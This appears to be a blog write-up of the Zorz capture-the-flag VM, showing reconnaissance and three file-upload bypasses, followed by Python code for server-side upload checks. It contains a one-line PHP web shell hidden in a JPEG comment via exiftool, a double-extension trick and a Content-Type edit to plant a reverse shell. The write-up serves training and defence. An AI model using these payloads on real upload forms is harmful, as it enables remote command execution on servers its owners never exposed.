[Hacking series] – TopHatSec:Zorz

Written by  on May 31, 2015 

Code name: Zorz

Webpage: http://www.top-hat-sec.com/r4v3ns-blog/another-vm-challenge-zorz

VM Download: http://download.vulnhub.com/tophatsec/Zorz.ova

Challenge: Bypass all 3 image uploaders

After making sure that Zorz is running under our VirtualBox, we proceed by running netdiscover as usual.

[Screenshot 1]

As our target is running under VirtualBox, its MAC address vendor is Cadmus Computer Systems. Now we can run nmap:

# nmap -Pn -A -p- 192.168.11.8

[Screenshot 2]

Port 80 is open, as expected. Time to put that address in the browser and start the show.

[Screenshot 3]

Once we enter the site, a simple image uploader appears. This will be our first “challenge”. Our goal is to upload an evil PHP file. So why not just select an evil PHP file in the browser and directly upload it to the server?

[Screenshot 4]

Lelz. File uploaded, so damn easy. But now, where is the file? After uploading the PHP shell, what we have to do is search for the “uploads” directory. We can start by using nikto.

# nikto -h http://192.168.11.8

[Screenshot: nikto output]

Uh, nothing new, except for phpMyAdmin (our goal is to pwn nothing more than the uploaders). We can try dirbuster to search for hidden directories.

# dirbuster

[Screenshot 5]

Jackpot! uploads1, uploads2 and uploads3. Using logic, our baby must be in the first directory.

[Screenshot 6]

Here it is, let’s run it.

[Screenshot 7]

Everything is working there. Let’s go for the second challenge.

The second uploader looks just like the first, but a few things work a little differently here. Let’s see what happens if we try the same trick we used on the first uploader.

[Screenshot 8]

What if we change the file extension?

[Screenshot 9]

uh..

[Screenshot 10]

Nothing. Well, for the next trick we will need a simple JPEG image. I can create it with GIMP.

[Screenshot 11]

What we will do now is edit the “Comment” field in the EXIF data of the image and put some evil PHP code there; exiftool will do the work.

# exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' 3.jpg

[Screenshot 12]

Now we can change the extension of that image to .php.jpg:

# cp 3.jpg 3.php.jpg

Meanwhile on the web browser…

[Screenshot 13]

Pwned. Challenge 2 completed, only the 3rd uploader remains.

[Screenshot 14]

A simple PHP & jQuery uploader. Let’s try a different trick on this one.

[Screenshot 15]

What we did here was use Burp Suite to change the Content-Type and the filename on the fly, and introduce our php-reverse-shell onto the system.

The result has been great, as expected.

[Screenshot 16]

And then

[Screenshot 17]

Game over Zorz P-)
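Each of the three uploaders fell to a different weak check: no extension check at all, a check fooled by a double extension with the payload hidden in a JPEG comment, and a check that trusted the client-supplied Content-Type. As an added, defender-side example (not code from the write-up or from the Zorz VM), the stdlib-only Python below shows the server-side checks that would have stopped all three: a single whitelisted extension, magic bytes that must agree with it, the client Content-Type ignored, and JPEG APPn/COM segments stripped so that a planted comment never reaches disk. The sample JPEG is a constructed skeleton, not a real image.

```python
import os
import re

# Allowed extensions mapped to the container type that the magic bytes must confirm.
ALLOWED = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
MAGIC = {b"\xff\xd8\xff": "jpeg", b"\x89PNG\r\n\x1a\n": "png", b"GIF8": "gif"}
SAFE_STEM = re.compile(r"^[a-z0-9_-]{1,64}$")


def check_upload(filename, data, client_content_type=None):
    """Return (ok, reason). client_content_type is accepted but deliberately
    ignored: it is attacker-controlled (the field edited in challenge 3)."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2:                      # rejects "shell" and "3.php.jpg"
        return False, "exactly one extension required"
    stem, ext = parts
    if ext not in ALLOWED:                   # rejects "shell.php"
        return False, "extension not allowed"
    if not SAFE_STEM.match(stem):
        return False, "unsafe file name"
    kind = next((k for m, k in MAGIC.items() if data.startswith(m)), None)
    if kind != ALLOWED[ext]:                 # rejects a PHP file renamed to .jpg
        return False, "content does not match extension"
    return True, "ok"


def strip_jpeg_metadata(data):
    """Drop APPn (EXIF etc.) and COM segments so a payload planted in the
    Comment field (challenge 2) never reaches disk; image data is untouched."""
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG")
    out, i = bytearray(b"\xff\xd8"), 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("corrupt segment marker")
        marker = data[i + 1]
        if marker in (0xD9, 0xDA):           # EOI or SOS: no metadata after this
            out += data[i:]
            return bytes(out)
        length = int.from_bytes(data[i + 2:i + 4], "big")
        if not (0xE0 <= marker <= 0xEF or marker == 0xFE):
            out += data[i:i + 2 + length]
        i += 2 + length
    raise ValueError("truncated JPEG")


# Constructed sample: a JPEG skeleton whose COM segment carries PHP, as in challenge 2.
PAYLOAD = b"<?php echo 'planted'; ?>"
SAMPLE_JPEG = (b"\xff\xd8\xff\xfe" + (len(PAYLOAD) + 2).to_bytes(2, "big")
               + PAYLOAD + b"\xff\xda\x00\x02\xff\xd9")
```

Files that pass should still be stored under a server-generated name in a directory the web server does not execute scripts from, so that a missed case cannot be reached as the write-up's uploads1 shell was.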

Category : hacking series
